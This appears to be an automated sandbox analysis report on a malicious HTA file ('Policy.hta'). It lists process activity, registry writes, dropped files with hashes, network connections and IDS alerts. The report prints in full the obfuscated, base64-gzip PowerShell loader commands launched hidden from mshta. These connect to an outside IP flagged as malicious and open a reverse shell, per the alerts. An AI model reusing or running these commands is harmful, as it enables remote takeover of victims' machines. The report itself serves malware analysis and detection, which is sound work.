YAVwAzAGIAVwB7ADIAfQB4AEYANwByAGQAagBvACcAJwArACcAJwA4AHAAcABQADEARwBhAHYAVQBYAFAAdgA3AFgAMgAzAGoAdgB6AGUAeABFADcANgA1ADUAUABZAGIAZgBkAGEARwAwADAAZAAxADkAbwA5AHIAWABXAHAAdABtADgAdABxAHoATQBaADIAYwB2AEoANgBJADUATwBSAGwAWgB0AHcAcgBDAHoAVQBYAHkAdwBRAGIAQgAyAFkAeQA4AGYARgBPAHsAMQB9AHkAcgB2AHYAYgAyAGgAeAA4AG4AVwBiADIAQQB4AEwAUQBoADcAcQByAG4ARgB0AG4AVwByAGkANQBtAGcALwBXAGMAMwBjADQATwByADMAZABYAHUAOABlADYAawB5ADEARgBNAFgAKwBBAHQAbQBlAFcAaQBUAGsAeAAvAFYAWgBhAGEAdQBsAHIAZgBEAHoAcAA5AEkAaQBlAHAAewAyAH0AdQA5AHoAcQA5AGcAYQBMAFkAUgB4AFIAbwBBAEIAMgA4ACcAJwArACcAJwBxAE0AVQBPACcAJwArACcAJwBpAHoAcAA1AFQAeAAnACcAKwAnACcANAB3AGsAbQBwAEkARQBvAHoAMwBKAFkANQBDAFQARwBFAGUAdwBzAFEAcwBLAEsAeABTAHkAcAB4ADAASgBHAFMAOQBHADgAYgBSAFkAVQBpAGsATQB3AHYAUQBTAHcAewAxAH0ANgA2ADAAawBXAG4AZwBUAGwANQAwAGwAUgBiAEYAMQBjAFQAQwAnACcAKwAnACcAQgBHAEsASQB1AE0AcwA1AFUAKwBEAHUAZgBjAEwAMQBlADMAeAA5AFUAcQB0AFAAagBxAHQAdAByAEkAUwB1AEQAagBWACcAJwArACcAJwAyAHUAeQAxAFUANAA2AFcAQwB1AG4AVQB3AEsAZwBlAGIASgBPAE0AKwB0AGcAawB7ADIAfQBpAEMASgBQADEAcQB1AE8AQgBqAGcARQB7ADEAfQBYAGUAaAArAHcAOQA3AEEARAB6ADAAdABvAEkAOQBEAFYARAB1AFcAZABJAHEAZwB4AFIAbAAvAGkAbAAxADMAcgBpAFEAZQB2AHcAQQBQAFUAYQBuAEQAeABhAGYAbwBkAEEAQQB3AEIAOQBTAFAAOABLAEoAUgA0AE8AaQBGAGYAVAB0AHoAUwA0ADgAbgBKAHkAYQArAGsAVABkADYAaQBmAFAAaAB6AC8ANAAwADIAegAzAHYALwBjAFAAbwBoAEsAbABYAEwASwBUAFkALwBiAGIANwBlAGUAewAxAH0AewAyAH0AWgBmADkAbgAxAFIANABoAHcAawBEAE8AaAB6AFYASgA4AG0AUAB0AHYAbwA1AEQAWAB5AFkAdgBrAHAAcABtAEIASQB2AEQAeQBsAFgANABQADMAeQBUADgANgBCAHEAKwByAHIASgBlAC8AeABlADQAaAB6AEUAYQBpAFEAcwBBAEEAQQB7ADAAfQB7ADAAfQAnACcAKQAtAGYAJwAnAD0AJwAnACwAJwAnAE4AJwAnACwAJwAnAEgAJwAnACkAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3196 | "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('{2}4sIAOZc9mICA7VW+2+qSB'+'T+/Sb3fyA3JkBiRa3bV3KTBR8VK62WglWv2Uxhk{1}GBsTD4unv/9z0g9LG33e1ucicxwsx5zXe+cw5eEjqcsF'+'DYL4Tvnz8J+RqgCAWCVMLnvbJQIjen/k5+Pi05/eA+FL4K0lRdrVosQCScXVw0kyjCIT+8Vy4xV+MYBw+U4FiShT+FkY8jf{2}TzsMAOF74LpT8ql5Q9IJ'+'qL7ZrI8bFwpIZuetZnDkojq5grSrgkfvsmytOj2qzSfkwQjSXR3MUcBxWXUlEWfsipw7vdCkuiQZyIxczjlREJj+sVK4yRh6/B2hobmPvMjUW4zf{1}9IsyTKMyvldo5SEkiPA4i5qiuG+E4Fs'+'vC{1}PUwnc1+l6a5+9sk5CTAFT3kOGIrE0dr4uC40kWhS/Et'+'9magZfKIhPOZLIPYmi2xVAoTSsvCfzE'+'jXe{1}{1}Ad5{2}laSXSiA14JFchrS+dVGDuQnFB1XxjUhTLsiwnvgAEP5IUfQ'+'KCqGz'+'0fA{1}Ej1vFGuanWAIWhqwmGTKX4VqWTDAO+Is2sFr6S5KsDx7ghzSQ8sftVUrFEEttmBjajPizp7VX+W/tFuidSr0Pptb2CMhbu1CFBCnIKz0'+'Vk6wR3GGR6UQu4b4JDE/wG4LUzx{2}PAU5pcZPau2A8CddLS{2}UxZ{2}qQF5jiApSLr8O5pA3SdRDAwcA3eEduFryoExwI'+'Z2Xxq7wnr6Dk{1'+'}ikKI7LwiCBOnXKgokRxW5ZUMOY5Edqwln2KD6{2}aySUEwfFvDA3k/8GZ+62ycKYR4kDSQUI7swVdgiiKSJloUtcrO1MMi/ci2/i0USUQvWA'+'pTXkA3ZS{2}EyeUiWCSIEWcsXEXA9WFAcgkXW{1}DkVz6BF5hWTMQnPsiu+EWdTBgfQpLgUgL4KEZJuU8bJgk4hDD0oxjq3/Ec{2}PnScLpRnhPDFSUVtTbcdT8pfwJ{2}68Syma45OhEXFAohOxQEMxPmkcuo'+'z0RbkhTRXWWA+p4WhLUlM3pKYb8LPIsc5ap+5Vb9FVotbW91Q91o3uoDXsdhvrnmk3u{1}nW+dVA50b7frEw1e6t{1}eYTXe3ekepy3{1}ivemRv9lV3vFVO9tp+U9W2+8Xc9cYtz5ufeuZt7bcO6Y+aQ61aR/1WO+mPtI1WbcRtsukOiTVc9jr8YWxTZ{2}nK/L52jsi2{2}y3sGjP2uqpe+sfOvufZl77h7sZd5XzUWKptVW2GbbujsauxFqkDxbY62tBqa8Mh7J3MFa8Be7TOOqjpb8+Ua6bOVdXSwwD52siuk8nq/tY{2}Wx0IwVCqDd3FW3bW{2}xF7rdjo'+'8ppP1GavUXPv7X23jvzexE7655PYbfdaG00d19o9rXWptm8tqzMZ2cvJ6I5ORlZtwrCzUXywQbB2Yy8fFO{1}yrvvb2hx8nWb2AxLQh7qrnFtnWri5mg/Wc3c4Or3dXu8e6ky1FMX+AtmeWiTkx/VZaaulrfDzp9Iiep{2}u9zq9gaLYRxRoAB28'+'qMUO'+'izp5Tx'+'4wkmpIEoz3JY5CTGEewsQsKKxSypx0JGS9G8bRYUikMwvQSw{1}660kWngTl50lRbF1cTC'+'BGKIuMs5U+DufcL1e3x9UqtPjqttrISuDjV'+'2uy1U46WCunUwKgebJOM+tgk{2}iCJP1quOBjgE{1}Xeh+w97ADz0toI9DVDuWdIqgxRl/il13riQevwAPUanDxafodAAwB9SP8KJR4OiFfTtzS48nJya+kTd6ifPhz/402z3v/cPohKlXLKTY/bb7ee{1}{2}Zf9n1R4hwkDOhzVJ8mPtvo5DXyYvkppmBIvDylX4P3yT86Bq+rrJe/xe4hzEaiQsAAA{0}{0}')-f'=','N','H')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
|
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPDaysSinceLastAutoMigration |
Value: 1 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPLastLaunchLowDateTime |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing |
Operation: | write | Name: | NTPLastLaunchHighDateTime |
Value: 30977695 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
Operation: | write | Name: | NextCheckForUpdateLowDateTime |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager |
Operation: | write | Name: | NextCheckForUpdateHighDateTime |
Value: 30977695 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main |
Operation: | write | Name: | CompatibilityFlags |
Value: 0 | |||
(PID) Process: | (2984) iexplore.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy[1].hta | html | |
MD5:B4FC4742EBCC8E216DB3B1C019E6D7BE | SHA256:64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2 | |||
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy[1].hta | html | |
MD5:B4FC4742EBCC8E216DB3B1C019E6D7BE | SHA256:64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2 | |||
2984 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\Policy.hta | html | |
MD5:B4FC4742EBCC8E216DB3B1C019E6D7BE | SHA256:64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2 | |||
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | binary | |
MD5:A7F36789ABEC447802483DAEF868E5C6 | SHA256:E46EA58251ED922164AE33876B7CADCCF32F47FA29BF9BE32B9DA152D92E2750 | |||
3132 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta.j1blg0i.partial | html | |
MD5:B4FC4742EBCC8E216DB3B1C019E6D7BE | SHA256:64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2 | |||
2984 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Policy.hta | html | |
MD5:B4FC4742EBCC8E216DB3B1C019E6D7BE | SHA256:64ED22F185C345EEAC64B06F4504B959E64BD80F989F3C4171CCD779CCDEACA2 | |||
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:FCFA516D48CBE832E5FA7BA81CE121A4 | SHA256:51155C6C29FF19CE4742E2083575D1F8AB06D868C59872B643D81769C8DDBA1D | |||
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F | binary | |
MD5:1A00FE93B412BC4C0368E41D58A57DA6 | SHA256:6EB06CD3932515F8721C94BAFE8765F7E995A9762E49208113FC0283F1569FC8 | |||
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | compressed | |
MD5:F7DCB24540769805E5BB30D193944DCE | SHA256:6B88C6AC55BBD6FEA0EBE5A760D1AD2CFCE251C59D0151A1400701CB927E36EA | |||
2984 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F | der | |
MD5:58A71F87AF282C6F1BE4382B43CF019A | SHA256:5FFD69796323104DA230E13AC796184F4A4651AC8B943E17D4FBBC680BA3D6FB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://crl3.digicert.com/Omniroot2025.crl | US | der | 7.78 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
2984 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 67.27.154.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?e66b6ea27af8c94a | US | compressed | 4.70 Kb | whitelisted |
2984 | iexplore.exe | GET | 200 | 67.27.154.126:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d7294ce1c16f410e | US | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2984 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
888 | powershell.exe | 40.113.243.243:80 | — | Microsoft Corporation | US | malicious |
3196 | powershell.exe | 40.113.243.243:80 | — | Microsoft Corporation | US | malicious |
2984 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
2984 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2984 | iexplore.exe | 67.27.154.126:80 | ctldl.windowsupdate.com | Level 3 Communications, Inc. | US | unknown |
2984 | iexplore.exe | 204.79.197.200:443 | ieonline.microsoft.com | Microsoft Corporation | US | whitelisted |
3132 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2984 | iexplore.exe | 23.2.175.10:443 | go.microsoft.com | Akamai International B.V. | US | malicious |
Domain | IP | Reputation |
---|---|---|
api.bing.com |
| whitelisted |
www.bing.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
crl3.digicert.com |
| whitelisted |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
ieonline.microsoft.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
888 | powershell.exe | A Network Trojan was detected | ET TROJAN Win32/Suspected Reverse Shell Connection |
888 | powershell.exe | Successful Administrator Privilege Gain | GPL EXPLOIT Microsoft cmd.exe banner |